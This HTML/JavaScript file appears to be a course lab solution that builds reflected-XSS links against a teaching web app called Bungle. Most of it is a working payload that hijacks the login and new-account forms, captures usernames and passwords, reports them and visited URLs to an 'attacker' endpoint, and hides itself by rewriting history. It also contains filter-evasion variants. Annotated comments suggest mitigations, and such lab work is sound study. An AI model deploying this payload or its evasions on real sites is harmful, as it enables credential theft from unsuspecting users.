- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
// payload(a): minified script body that makeLink() serialises with toString() into the `q`
// parameter of the lab application's search page. `a` is the URL used as the $.get destination.
//
// Reading of the minified code, for analysis:
//   b(b)   - calls console.log($.param(dafta)) and then $.get(a, b), i.e. a GET to `a` with the
//            event object as query parameters.
//   c()    - hides the page, strips href from #bungle-lnk, #search-again-btn and every
//            .history-item and replaces them with click handlers that call d(); hides history
//            items whose text contains the marker "cTc2fWp1TFgFj7M6aFBl" (presumably the
//            entries left by the injection itself; confirm against the lab). It then takes over
//            #search-btn, #log-in-btn, #log-out-btn and #new-account-btn: the login and
//            new-account handlers read #username/#userpass, pass them to b() as
//            {event:"login", user, pass}, and only then submit them to ./login or ./create.
//   d(a,d) - reports {event:"nav", user, url} through b(), then either loads the target path
//            into the html element and pushes a history entry, or restores history.state.html;
//            both paths call c() again so the handlers survive the content swap.
//   ready  - appends a script element holding `attacker`, `cu` and the source of d, b and c,
//            sets window.onpopstate, calls history.replaceState(null,"","/") so the address bar
//            shows "/" rather than the injected query string, and loads "/" into the page.
//
// NOTE(review): `dafta` and `index` are not declared anywhere in this listing, so behaviour at
// those two points depends on globals that are not shown here.
//
// Defensive reading: credentials are captured from the form fields before submission, so
// HttpOnly cookies do not help; the page is kept alive through AJAX content swaps and the
// History API instead of real navigations. Things to look for are GET requests to a foreign
// origin carrying user/pass/url parameters. Mitigations are context-aware output encoding of
// the reflected `q` value and a Content-Security-Policy that disallows inline script and
// restricts connect-src.
- function payload(a){function b(b){console.log($.param(dafta)),$.get(a,b)}function c(){$("html").hide(),$("#bungle-lnk").removeAttr("href"),$("#bungle-lnk").click(function(){d("/","/"!=history.state.url)}),$("#search-again-btn").removeAttr("href"),$("#search-again-btn").click(function(){d("/",!0)}),$(".history-item").each(function(){var a=$(this).attr("href");$(this).removeAttr("href"),$(this).click(function(){d(a,!0)}),$(this).text().includes("cTc2fWp1TFgFj7M6aFBl")?$(this).hide():index%2==0&&$(this).hide()}),$("#search-btn").click(function(a){a.preventDefault();var b=$("#query").val();$.ajax({url:"./search",data:{q:b},type:"GET",success:function(a){$("html").html(a),d("search?q="+b,!0)}})}),$("#log-in-btn").click(function(a){a.preventDefault();var c=$("#username").val(),e=$("#userpass").val();b({event:"login",user:c,pass:e}),console.log("setting cu to "+c),cu=c,$.ajax({url:"./login",data:{username:c,password:e},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("#log-out-btn").click(function(a){a.preventDefault(),b({event:"logout",user:cu}),cu="",$.ajax({url:"./logout",data:{},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("#new-account-btn").click(function(a){a.preventDefault();var c=$("#username").val(),e=$("#userpass").val();b({event:"login",user:c,pass:e}),console.log("setting cu to "+c),cu=c,$.ajax({url:"./create",data:{username:c,password:e},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("html").show()}function d(a,d){var e="http://cos432-assn3.cs.princeton.edu/"+encodeURIComponent(a);b({event:"nav",user:cu,url:e}),d?$("html").load(a,function(){c(),history.pushState({url:a,html:$("html").html()},"",a)}):($("html").html(history.state.html),c())}$("html").hide(),$(document).ready(function(){var 
e=document.createElement("s"+"cript");e.text="var attacker = \""+a+"\";\nvar cu = \"\";\n"+d.toString()+"\n"+b.toString()+"\n"+c.toString(),$("html").append(e),window.onpopstate=function(a){d(a.state.url,!1)},history.replaceState(null,"","/"),$("html").load("/",function(){c(),history.replaceState({url:"/",html:$("html").html()},"","/")})})}
// makeLink(xssdefense, target, attacker): builds the lab URL whose `q` search parameter carries
// the source of payload() followed by a call to it with `attacker`.
//   xssdefense - defence level; also sent to the target as the `xssdefense` query parameter
//   target     - origin of the application whose /search page reflects `q`
//   attacker   - URL handed to payload() as its reporting endpoint
// Returns the URL string for levels 0-2 and the literal "not done yet" for level 3; any other
// level falls through every branch and returns undefined.
// Levels as written: 0 sends a plain script element; 1 rewrites every "script" in the URL to
// "sscriptcript" (presumably aimed at a filter that deletes "script" in a single pass; confirm
// against the lab server); 2 moves the code into a body onload attribute.
// Defensive reading: deleting keywords or tags from input is not an XSS defence. The reflected
// `q` value needs context-aware output encoding, backed by a Content-Security-Policy that
// disallows inline script and inline event handlers.
- function makeLink(xssdefense, target, attacker) {
- var original = target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";" + payload.name + "(\"" + attacker + "\");<\/script" + ">");
- if (xssdefense == 0) {
- return original;
- } else { // Implement code to defeat XSS defenses here.
- if (xssdefense == 1) {
- return original.replace(/script/g, "sscriptcript");
- }
- // level 2: the code is carried in a body onload event-handler attribute, not a script element
- else if (xssdefense == 2) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<body onload='" + payload.toString() + payload.name + "(\"" + attacker + "\");'<\/body" + ">");
- }
- // level 3: not implemented in this paste; returns a placeholder string instead of a URL
- else if (xssdefense == 3) {
- return "not done yet";
- }
- }
- }
// Lab configuration: the defence level to generate a link for, the origin of the vulnerable
// application, and the reporting endpoint handed to payload(). 127.0.0.1:31337 is a loopback
// address, so reports go to a listener on the machine that runs the browser.
- var xssdefense = 2;
- var target = "http://cos432-assn3.cs.princeton.edu";
- var attacker = "http://127.0.0.1:31337/stolen";
// On DOM ready, replace the contents of the page's h3 element with a link (target="run") to the
// generated URL; until then the h3 shows the "parse error" text from the markup.
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3>parse error</h3>